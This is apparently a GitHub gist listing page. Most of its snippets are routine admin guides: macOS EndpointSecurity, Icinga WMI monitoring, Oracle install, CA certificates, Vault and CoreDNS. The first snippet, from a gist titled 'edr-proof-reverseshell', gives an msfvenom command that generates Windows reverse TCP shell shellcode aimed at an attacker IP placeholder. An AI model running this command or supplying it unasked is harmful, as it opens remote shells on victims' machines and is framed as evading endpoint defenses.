Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp
Anubhav Gain anubhavg-icpl
anubhavg-icpl
/ edr-proof-reverseshell.md
Created
May 6, 2025 07:33
anubhavg-icpl
/ EndpointSecurityDemo.m
Created
April 23, 2025 10:10
— forked from Omar-Ikram/EndpointSecurityDemo.m
A demo of using Apple's EndpointSecurity framework - tested on macOS Monterey 12.2.1 (21D62)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // main.m | |
| // EndpointSecurityDemo | |
| // | |
| // Created by Omar Ikram on 17/06/2019 - macOS Catalina 10.15 Beta 1 (19A471t) | |
| // Updated by Omar Ikram on 15/08/2019 - macOS Catalina 10.15 Beta 5 (19A526h) | |
| // Updated by Omar Ikram on 01/12/2019 - macOS Catalina 10.15 (19A583) | |
| // Updated by Omar Ikram on 31/01/2021 - macOS Big Sur 11.1 (20C69) | |
| // Updated by Omar Ikram on 07/05/2021 - macOS Big Sur 11.3.1 (20E241) | |
| // Updated by Omar Ikram on 04/07/2021 - macOS Monterey 12 Beta 2 (21A5268h) |
anubhavg-icpl
/ idontknowwmci.md
Created
February 21, 2025 16:44
https://community.icinga.com/t/monitoring-windows-remotely-through-wmi/2007
Below is an example document that explains how to set up and use remote Windows monitoring through WMI with Icinga. You can adjust paths, usernames, and parameters as needed for your environment.
This guide details how to monitor Windows machines without installing an agent by leveraging the Windows Management Instrumentation (WMI) layer. It focuses on using the check_wmi_plus plugin with Icinga, along with the WMIC client on Linux. Although other methods (e.g. PowerShell, SSH, SNMP) exist, this guide covers the WMI solution primarily for legacy environments (Windows Server 2012 and later).
anubhavg-icpl
/ oracle-23ai.md
Created
December 1, 2024 18:58
Based on the documentation, I'll help guide you through installing Oracle Database Free on Oracle Linux 9. Here are the steps:
-
First, log in as the root user.
-
Install the Oracle Database Preinstallation RPM:
dnf -y install oracle-database-preinstall-23ai- Go to the Oracle Database Free software download page:
anubhavg-icpl
/ cert_gen.sh
Created
November 24, 2024 08:21
A certficate generator for communication can be use for internal.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # create-ca.sh - Script to create a Certificate Authority and generate certificates | |
| # Create directory structure | |
| mkdir -p ca/{root-ca,intermediate-ca,certs,private,crl,csr} | |
| chmod 700 ca/private | |
| # Create root CA configuration file | |
| cat > ca/root-ca.conf << EOL | |
| [ req ] |
anubhavg-icpl
/ onlinescanner.svg
Created
October 11, 2024 09:23
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
anubhavg-icpl
/ wazuh.md
Created
September 26, 2024 10:43
anubhavg-icpl
/ hashicrop-vault.md
Created
September 23, 2024 10:11
First, let's install HashiCorp Vault on your system:
# Download and install Vault
curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add -
sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com $(lsb_release -cs) main"
anubhavg-icpl
/ compreshensive-coredns.md
Created
September 21, 2024 19:10
anubhavg-icpl
/ coredns-poc-idk.md
Last active
September 21, 2024 07:56
This guide will walk you through setting up a system to serve your local VMs over HTTPS using custom domain names (e.g., https://xyz.local). We'll use the following components:
- Hypervisor (e.g., VirtualBox, VMware, or Hyper-V)
- CoreDNS for local DNS resolution
- NGINX as a reverse proxy
- Smallstep/certificates for certificate management
NewerOlder